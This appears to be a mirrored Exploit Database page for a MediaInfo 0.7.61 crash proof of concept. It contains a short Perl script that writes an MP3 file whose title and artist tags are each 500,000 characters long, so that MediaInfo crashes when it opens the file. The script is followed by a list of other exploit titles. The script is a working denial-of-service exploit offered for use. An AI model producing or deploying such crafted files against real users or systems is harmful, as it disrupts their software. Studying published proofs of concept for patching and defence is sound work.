MediaInfo 0.7.61 – Crash (PoC)

Exploit Database
15 阅读

作者： Mohammad Reza Espargham

日期： 2016-05-10
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/39795/

#!/usr/bin/perl -w
# Title : Windows Media Player MediaInfo v0.7.61 - Buffer Overflow Exploit
# Tested on Windows 7 / Server 2008
# Download Link : https://sourceforge.net/projects/mediainfo/files/binary/mediainfo-gui/0.7.61/
#
#
# Author: Mohammad Reza Espargham
# Linkedin: https://ir.linkedin.com/in/rezasp
# E-Mail: reza.espargham@owasp.org
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook: https://www.facebook.com/reza.espargham
#
# Github : github.com/rezasp
#
#
#
# 1 . run perl code : perl reza.pl
# 2 . open 1.mp3 by mediainfo.exe
# 3 . Crashed ;)

use MP3::Tag;

$mp3 = MP3::Tag->new('1.mp3');
$mp3->title_set('A' x 500000);
$mp3->artist_set('A' x 500000);
$mp3->update_tags();
$mp3->close();

last Exploits
MediaInfo 0.7.61 – Crash (PoC)的更多信息

Sony PC Companion 2.1 – ‘CheckCompatibility()’ Unicode Stack Buffer Overflow：
Book Library 1.4.162 – ‘.bkd’ Local Denial of Service：
GOM Media Player 2.1.6.3499 – Buffer Overflow (Denial of Service) (PoC)：
Adobe Flash AS2 – DisplacementMapFilter.mapBitmap Use-After-Free (2)：
Apple iOS/macOS – Kernel Memory Corruption due to Integer Overflow in IOHIDResourceQueue::enqueueReport：
Polycom SoundPoint IP Devices – Denial of Service：
Mozilla Firefox 63.0.1 – Denial of Service (PoC)：
ISC BIND 9 – TKEY (PoC)：